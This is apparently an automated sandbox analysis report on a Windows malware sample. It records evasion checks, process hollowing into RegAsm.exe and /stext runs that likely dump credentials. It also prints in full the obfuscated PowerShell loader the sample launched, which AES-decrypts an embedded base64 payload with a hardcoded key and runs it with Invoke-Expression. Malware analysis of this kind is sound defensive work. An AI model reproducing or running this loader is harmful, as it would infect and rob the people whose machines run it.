                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040F7A7 Sleep,ExitProcess,3_2_0040F7A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,3_2_0041A748
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4496Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5370Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1056Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 8437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1772Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-52721
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 9.4 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6816Thread sleep count: 272 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6816Thread sleep time: -136000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6768Thread sleep count: 1056 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6768Thread sleep time: -3168000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6768Thread sleep count: 8437 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6768Thread sleep time: -25311000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_00409253
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_0041C291
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_0040C34D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_00409665
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_0040880C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040783C FindFirstFileW,FindNextFileW,3_2_0040783C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00419AF5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040BB30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040BD37
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,4_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00407C97
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00418981 memset,GetSystemInfo,4_2_00418981
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: wscript.exe, 00000000.00000003.1641436794.0000025D73463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1640762944.0000025D7344B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1640791138.0000025D7345F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HGFs]
                    Source: RegAsm.exe, 00000003.00000002.2929959756.0000000000FD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW2
                    Source: RegAsm.exe, 00000003.00000002.2929959756.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: bhvDE09.tmp.4.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                    Source: wscript.exe, 00000000.00000003.1641436794.0000025D73463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1640762944.0000025D7344B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1640791138.0000025D7345F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HgFs]
                    Source: powershell.exe, 00000001.00000002.1796467839.000001F16A43B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: bhvDE09.tmp.4.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_3-54572
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004349F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041CB50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004432B5 mov eax, dword ptr fs:[00000030h]3_2_004432B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_10004AB4 mov eax, dword ptr fs:[00000030h]3_2_10004AB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00411CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,3_2_00411CFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004349F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00434B47 SetUnhandledExceptionFilter,3_2_00434B47
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0043BB22
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00434FDC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_10002639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10002B1C

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: amsi64_6744.amsi.csv, type: OTHER
                    Source: Yara matchFile source: amsi64_6744.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6744, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,3_2_004180EF
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AED008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe3_2_00412117
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00419627 mouse_event,3_2_00419627
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkpfvnsml"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xeupwfcgzmvn"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp"Jump to behavior
